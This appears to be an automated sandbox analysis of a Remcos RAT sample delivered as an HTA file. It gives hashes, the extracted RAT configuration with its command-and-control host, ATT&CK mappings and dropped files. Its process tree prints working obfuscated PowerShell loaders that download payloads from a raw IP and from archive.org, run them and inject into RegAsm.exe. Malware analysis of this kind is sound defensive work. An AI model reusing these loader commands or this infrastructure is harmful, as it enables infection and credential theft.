remcos | e15bf785da97ec4893315687222ab28f491b49de7e95558086cd59d23b85c057

Analysis

max time kernel
148s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
24-09-2024 14:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

IEnetbookCookies.hta
Size

115KB
MD5

e22849cf884da37532e50f50a298c344
SHA1

b40e6ca50290ed885ff60c691444b33f3fb0a643
SHA256

e15bf785da97ec4893315687222ab28f491b49de7e95558086cd59d23b85c057
SHA512

7d241fe5b00949a1b3f12f86359f1870a19fbf400b7ebb10ae6936ea44ab6ac01cd838d801a7be502b3e58c97c33db317ef1d0bc12db108f2f766ad6bf03b40e
SSDEEP

96:Ea+M7XN7VQ63VQcuLNdfJ1LV9jzeVQda8AT:Ea+QXgXPnzILT

Score

10^/10

remcos zynova collection defense_evasion discovery execution rat spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Extracted

Family

remcos

Botnet

zynova

2024remcmon.duckdns.org:14645

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-R2I0JW
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/3932-122-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/856-121-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/1680-117-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/856-121-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/1680-117-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
13	4164	powershell.exe
21	648	powershell.exe
42	648	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4892	powershell.exe
648	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
4164	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	WScript.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	RegAsm.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 648 set thread context of 1380	648	powershell.exe	100
PID 1380 set thread context of 1680	1380	RegAsm.exe	101
PID 1380 set thread context of 856	1380	RegAsm.exe	103
PID 1380 set thread context of 3932	1380	RegAsm.exe	107

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
4164	powershell.exe
4164	powershell.exe
4892	powershell.exe
4892	powershell.exe
648	powershell.exe
648	powershell.exe
1680	RegAsm.exe
1680	RegAsm.exe
3932	RegAsm.exe
3932	RegAsm.exe
1680	RegAsm.exe
1680	RegAsm.exe

Suspicious behavior: MapViewOfSection 7 IoCs

pid	Process
1380	RegAsm.exe
1380	RegAsm.exe
1380	RegAsm.exe
1380	RegAsm.exe
1380	RegAsm.exe
1380	RegAsm.exe
1380	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4164	powershell.exe
Token: SeDebugPrivilege	4892	powershell.exe
Token: SeDebugPrivilege	648	powershell.exe
Token: SeDebugPrivilege	3932	RegAsm.exe

Suspicious use of WriteProcessMemory 57 IoCs

description	pid	Process	procid_target
PID 2848 wrote to memory of 3332	2848	mshta.exe	82
PID 2848 wrote to memory of 3332	2848	mshta.exe	82
PID 2848 wrote to memory of 3332	2848	mshta.exe	82
PID 3332 wrote to memory of 4164	3332	cmd.exe	84
PID 3332 wrote to memory of 4164	3332	cmd.exe	84
PID 3332 wrote to memory of 4164	3332	cmd.exe	84
PID 4164 wrote to memory of 3776	4164	powershell.exe	85
PID 4164 wrote to memory of 3776	4164	powershell.exe	85
PID 4164 wrote to memory of 3776	4164	powershell.exe	85
PID 3776 wrote to memory of 3436	3776	csc.exe	86
PID 3776 wrote to memory of 3436	3776	csc.exe	86
PID 3776 wrote to memory of 3436	3776	csc.exe	86
PID 4164 wrote to memory of 3164	4164	powershell.exe	89
PID 4164 wrote to memory of 3164	4164	powershell.exe	89
PID 4164 wrote to memory of 3164	4164	powershell.exe	89
PID 3164 wrote to memory of 4892	3164	WScript.exe	90
PID 3164 wrote to memory of 4892	3164	WScript.exe	90
PID 3164 wrote to memory of 4892	3164	WScript.exe	90
PID 4892 wrote to memory of 648	4892	powershell.exe	94
PID 4892 wrote to memory of 648	4892	powershell.exe	94
PID 4892 wrote to memory of 648	4892	powershell.exe	94
PID 648 wrote to memory of 1380	648	powershell.exe	100
PID 648 wrote to memory of 1380	648	powershell.exe	100
PID 648 wrote to memory of 1380	648	powershell.exe	100
PID 648 wrote to memory of 1380	648	powershell.exe	100
PID 648 wrote to memory of 1380	648	powershell.exe	100
PID 648 wrote to memory of 1380	648	powershell.exe	100
PID 648 wrote to memory of 1380	648	powershell.exe	100
PID 648 wrote to memory of 1380	648	powershell.exe	100
PID 648 wrote to memory of 1380	648	powershell.exe	100
PID 648 wrote to memory of 1380	648	powershell.exe	100
PID 648 wrote to memory of 1380	648	powershell.exe	100
PID 648 wrote to memory of 1380	648	powershell.exe	100
PID 1380 wrote to memory of 1680	1380	RegAsm.exe	101
PID 1380 wrote to memory of 1680	1380	RegAsm.exe	101
PID 1380 wrote to memory of 1680	1380	RegAsm.exe	101
PID 1380 wrote to memory of 1680	1380	RegAsm.exe	101
PID 1380 wrote to memory of 1692	1380	RegAsm.exe	102
PID 1380 wrote to memory of 1692	1380	RegAsm.exe	102
PID 1380 wrote to memory of 1692	1380	RegAsm.exe	102
PID 1380 wrote to memory of 856	1380	RegAsm.exe	103
PID 1380 wrote to memory of 856	1380	RegAsm.exe	103
PID 1380 wrote to memory of 856	1380	RegAsm.exe	103
PID 1380 wrote to memory of 856	1380	RegAsm.exe	103
PID 1380 wrote to memory of 2900	1380	RegAsm.exe	104
PID 1380 wrote to memory of 2900	1380	RegAsm.exe	104
PID 1380 wrote to memory of 2900	1380	RegAsm.exe	104
PID 1380 wrote to memory of 4328	1380	RegAsm.exe	105
PID 1380 wrote to memory of 4328	1380	RegAsm.exe	105
PID 1380 wrote to memory of 4328	1380	RegAsm.exe	105
PID 1380 wrote to memory of 404	1380	RegAsm.exe	106
PID 1380 wrote to memory of 404	1380	RegAsm.exe	106
PID 1380 wrote to memory of 404	1380	RegAsm.exe	106
PID 1380 wrote to memory of 3932	1380	RegAsm.exe	107
PID 1380 wrote to memory of 3932	1380	RegAsm.exe	107
PID 1380 wrote to memory of 3932	1380	RegAsm.exe	107
PID 1380 wrote to memory of 3932	1380	RegAsm.exe	107

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\IEnetbookCookies.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2848
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C pOWersHElL -ex ByPasS -Nop -w 1 -C deVIcECRedeNtiaLDeploYmeNt ; iex($(IeX('[sYStEm.tEXT.ENCoding]'+[ChAr]58+[chAR]0X3A+'utf8.gEtSTrInG([SySTem.COnveRT]'+[Char]0x3a+[cHAR]0X3A+'fROmbasE64STring('+[ChAr]0X22+'JG9QMmVEVUJFZ2ogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQmVyZGVmaW5JVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZObEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xYWU9ZZXEsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbUpBenZBKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVmsiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRtQSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkb1AyZURVQkVnajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEzNC4yNTUuMjI3LjI0OC94YW1wcC9rYi9uaWNlcGljdHVyZXdpdGhoZXJpbWFnZXNnb29kLnRJRiIsIiRlTnY6QVBQREFUQVxuaWNlcGljdHVyZXdpdGhoZXJpbWFnZXNnb29kLnZCUyIsMCwwKTtzdEFSVC1TTGVFUCgzKTtTVGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXBpY3R1cmV3aXRoaGVyaW1hZ2VzZ29vZC52QlMi'+[ChAr]34+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3332
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOWersHElL -ex ByPasS -Nop -w 1 -C deVIcECRedeNtiaLDeploYmeNt ; iex($(IeX('[sYStEm.tEXT.ENCoding]'+[ChAr]58+[chAR]0X3A+'utf8.gEtSTrInG([SySTem.COnveRT]'+[Char]0x3a+[cHAR]0X3A+'fROmbasE64STring('+[ChAr]0X22+'JG9QMmVEVUJFZ2ogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQmVyZGVmaW5JVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZObEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xYWU9ZZXEsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbUpBenZBKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVmsiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRtQSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkb1AyZURVQkVnajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEzNC4yNTUuMjI3LjI0OC94YW1wcC9rYi9uaWNlcGljdHVyZXdpdGhoZXJpbWFnZXNnb29kLnRJRiIsIiRlTnY6QVBQREFUQVxuaWNlcGljdHVyZXdpdGhoZXJpbWFnZXNnb29kLnZCUyIsMCwwKTtzdEFSVC1TTGVFUCgzKTtTVGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXBpY3R1cmV3aXRoaGVyaW1hZ2VzZ29vZC52QlMi'+[ChAr]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4164
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iau3l15j\iau3l15j.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3776
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES90F5.tmp" "c:\Users\Admin\AppData\Local\Temp\iau3l15j\CSC148C16351E1742419D65B786E04067E1.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3436
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicepicturewithherimagesgood.vBS"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3164
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbElkWzFdKyRTSEVsTGlEWzEzXSsneCcpICggKCd4UGl1cmwnKycgPScrJyBzJysna3JodHRwJysnczovLycrJ2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdicrJ2Uub3JnJysnLzI0L2l0JysnZScrJ21zL2RldGFoLScrJ25vdGUtJysndi9EZScrJ3RhaE5vdGVWJysnLnR4dHNrJysncjt4UGknKydiYScrJ3NlJysnNjRDbycrJ24nKyd0ZScrJ250ID0gKCcrJ05ldy1PYmplJysnY3QgUycrJ3lzdGVtLicrJ05ldC5XZWJDJysnbGknKydlbnQpLicrJ0Rvd25sJysnb2FkU3RyaW4nKydnKHhQaXVybCk7JysneFAnKydpJysnYmluYXJ5JysnQ29udGUnKydudCA9IFtTeXN0JysnZW0uQ29udmVydF06OkZyb21CJysnYScrJ3NlNjRTJysndHJpbicrJ2coeFBpJysnYmFzZTY0Q29udGUnKyduJysndCk7eFBpYXMnKydzZW1ibHkgPScrJyBbUmVmbGVjJysndCcrJ2knKydvbi5Bc3NlbWJseScrJ106JysnOkwnKydvYWQoJysneFBpYmluJysnYXInKyd5Q29udGVudCk7eFAnKydpdHknKydwZSA9IHgnKydQaWFzJysnc2VtJysnYicrJ2x5LkdlJysndFR5cCcrJ2Uoc2tyJysnUnUnKyduUCcrJ0UuSG9tZXNrcicrJyk7eFBpJysnbWUnKyd0aG9kID0geFBpdHknKydwZS5HZXRNZXQnKydobycrJ2QoJysnc2tyVkFJc2tyJysnKTt4UCcrJ2knKydtZXRob2QnKycuSW52Jysnb2tlKHhQaW51bGwnKycsJysnIFsnKydvYmplJysnY3RbXV1AJysnKHNrcnR4dC5LS1JPTksnKycvYmsvcHBtYXgnKycvODQyLjcnKycyJysnMi41NTIuNDMxLy86cCcrJ3R0aHNrciAsJysnICcrJ3MnKydrcmRlc2F0aXZhZG8nKydza3IgLCAnKydza3JkJysnZXNhdGl2JysnYWQnKydvcycrJ2snKydyICcrJywgc2tyZCcrJ2UnKydzYXRpdmFkb3Nrcixza3JSZScrJ2dBcycrJ21zaycrJ3Isc2tyc2tyKSknKS5SRVBsQWNFKCd4UGknLCckJykuUkVQbEFjRSgoW2NIQXJdMTE1K1tjSEFyXTEwNytbY0hBcl0xMTQpLFtTVHJpTkddW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4892
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $shEllId[1]+$SHElLiD[13]+'x') ( ('xPiurl'+' ='+' s'+'krhttp'+'s://'+'ia600100'+'.us.'+'archiv'+'e.org'+'/24/it'+'e'+'ms/detah-'+'note-'+'v/De'+'tahNoteV'+'.txtsk'+'r;xPi'+'ba'+'se'+'64Co'+'n'+'te'+'nt = ('+'New-Obje'+'ct S'+'ystem.'+'Net.WebC'+'li'+'ent).'+'Downl'+'oadStrin'+'g(xPiurl);'+'xP'+'i'+'binary'+'Conte'+'nt = [Syst'+'em.Convert]::FromB'+'a'+'se64S'+'trin'+'g(xPi'+'base64Conte'+'n'+'t);xPias'+'sembly ='+' [Reflec'+'t'+'i'+'on.Assembly'+']:'+':L'+'oad('+'xPibin'+'ar'+'yContent);xP'+'ity'+'pe = x'+'Pias'+'sem'+'b'+'ly.Ge'+'tTyp'+'e(skr'+'Ru'+'nP'+'E.Homeskr'+');xPi'+'me'+'thod = xPity'+'pe.GetMet'+'ho'+'d('+'skrVAIskr'+');xP'+'i'+'method'+'.Inv'+'oke(xPinull'+','+' ['+'obje'+'ct[]]@'+'(skrtxt.KKRONK'+'/bk/ppmax'+'/842.7'+'2'+'2.552.431//:p'+'tthskr ,'+' '+'s'+'krdesativado'+'skr , '+'skrd'+'esativ'+'ad'+'os'+'k'+'r '+', skrd'+'e'+'sativadoskr,skrRe'+'gAs'+'msk'+'r,skrskr))').REPlAcE('xPi','$').REPlAcE(([cHAr]115+[cHAr]107+[cHAr]114),[STriNG][cHAr]39))"
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:648
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:1380
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\duuzgspewhdfz"
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1680
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\nozrzlaykpvsbbvhz"
        8⤵
        
        PID:1692
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\nozrzlaykpvsbbvhz"
        8⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:856
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\yqecadkzgxnxlqrlircv"
        8⤵
        
        PID:2900
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\yqecadkzgxnxlqrlircv"
        8⤵
        
        PID:4328
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\yqecadkzgxnxlqrlircv"
        8⤵
        
        PID:404
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\yqecadkzgxnxlqrlircv"
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3932

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9faf6f9cd1992cdebfd8e34b48ea9330

SHA1
ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e

SHA256
0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953

SHA512
05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
6fc6c37fcbbdb88980559bb9d3edcfde

SHA1
5fb1fb181f5bcff2e6bab13682458e280e32c95e

SHA256
d9ee8278b0bbc476ddba0c4dcf27977abcba2e098f704f4e97f0d6ca11d2f27a

SHA512
4116d8b20d75dce7359e026d75554b9745866a79db1b76d23365c13616ca3a9bf2dd8bd5e719f88396b317c1f6141179cfc74de8d7e127533b9889d2e5785668

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES90F5.tmp

Filesize
1KB

MD5
4097e11981c3c24353b1d628a23cc305

SHA1
9589fc6cd647a1ad2466c6bd1192e3ce98d85f18

SHA256
f772c1286f2d4c884eb61d332a4daea814c6bc964a9be170acdc1041a659e4c9

SHA512
905624e3aec035b8823bf442bd278b3039fb0728aee9e381a8b661745ad4d2b7e76ab77f59a2d7a9514f1b3782a2dad0e5064f263618113ceefb37edffeae156

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_imzsitdp.n1v.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\duuzgspewhdfz

Filesize
4KB

MD5
8b8277c8f03c24d1f290dbe476e961d2

SHA1
2e13baf3a4b708277d550dc3dd1e0f99b131f78e

SHA256
9af6881f6dbffba028a7a977f4c0a43c764f840332986993ad66de7b816c2f9e

SHA512
7367a0236cd0d6cd731caf1ba1f4ea8f851ea1018a9c6b49db6e9d13b2aaba92767774da9169481918e4287021ff5c3a58c3143eaa5e7fe9fa88383208615948

Download Submit
C:\Users\Admin\AppData\Local\Temp\iau3l15j\iau3l15j.dll

Filesize
3KB

MD5
d57af762bcf80277927d2bbcbcfe874f

SHA1
50f518d2f4d4280824895bb670ba26371904f3ec

SHA256
a744654fb713a989e51b10790af511e153369189662c908f9fc60b39b70b5eb3

SHA512
636778c73f08e6be463d99e3bebd3df523ec47cf1356628ea23654c731b48f797724ef3f2291e611b417ed0eff9dbe8ead58464cc628a414dcdef7413109629c

Download Submit
C:\Users\Admin\AppData\Roaming\nicepicturewithherimagesgood.vBS

Filesize
257KB

MD5
134f2e8115174dea5246b807fd0c8427

SHA1
c47a738087706c17b345c8b93b8eb71c1518e3a8

SHA256
01b5377b8e2fd5cc88c57a2115fefc853ddecbf4aff300357391dcd803b7d67d

SHA512
efc7386287e271b6d1050f1c585073351b0b9cc9cd551cb759f02fbe4a492bb3ff20b3d498cd608558353b1879a591ae630e5e0e1e0d7286a31fdde7787c0c08

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iau3l15j\CSC148C16351E1742419D65B786E04067E1.TMP

Filesize
652B

MD5
9e489c938d7eb4c20297fa04e1197ab6

SHA1
fdf32d3b41a2c1bcd0b68e7bc3893e206eeebf58

SHA256
b29dddd9db02e433f2f50c816074c6e3816a7f52e912ba33ae10693d40645301

SHA512
6fc33dd51a541aa07583b4e68495bc4455bdfb54b94f5dd11b1bdff82f572dc8dbd0eaee5ae3ab0003c50ed234e0779668f7a3ce60fdfabade48193fbe4fd267

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iau3l15j\iau3l15j.0.cs

Filesize
458B

MD5
e07522da7bc6c3ae3fc141d4f7384edf

SHA1
0b2d7ab75bca2211d5aea9a1671929f033bbaf09

SHA256
b0428efd614521c6b91abdad5a9885a2698f8729a6fc77087383a4a07e28da19

SHA512
6d30515cd0dddd23f8d2554d107c5afee82d29aa7c5dc6878546758350c13bd8421b066b39bd1d782381e70e75f9afe1e521d301e9478ecf16f9b075ed34addd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iau3l15j\iau3l15j.cmdline

Filesize
369B

MD5
2e561f21508b462cc4ea519c0d7e4887

SHA1
